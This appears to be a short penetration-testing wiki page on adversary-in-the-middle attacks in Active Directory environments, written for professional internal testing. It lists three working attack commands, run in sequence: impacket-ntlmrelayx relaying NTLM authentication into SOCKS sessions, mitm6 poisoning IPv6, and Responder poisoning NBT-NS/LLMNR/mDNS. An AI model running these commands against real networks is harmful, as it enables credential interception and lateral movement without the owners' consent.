Adversary-In-The-Middle
Adversary-in-The-Middle (AiTM), also known as Man-in-The-Middle (MiTM), is where an attacker inserts themselves between two communicating parties to intercept, monitor, and potentially manipulate the communication.
AiTM is a popular attack path many penetration testers will attempt early on during an internal penetration test for lower/medium maturity organizations. Many configurations that are exploited to obtain AiTM are due to default configurations within Active Directory, and some of the remediations can be hard to implement in some instances.
I recommend reading the pages in this section to understand each tool and what it exploits, but here is an example of the three tools I run in this specific order:
Start impacket-ntlmrelayx to relay authentication traffic to other computers and create remote SOCKS sessions if successful
impacket-ntlmrelayx -6 -wh [hostname].[domain] -tf [targets] -of socks -socks -smb2supportStart mitm6 to poison IPv6
mitm6 -d [domain.com]Start Responder to poison NBT-NS/LLMNR/mDNS
responder -I eth0 -PLast updated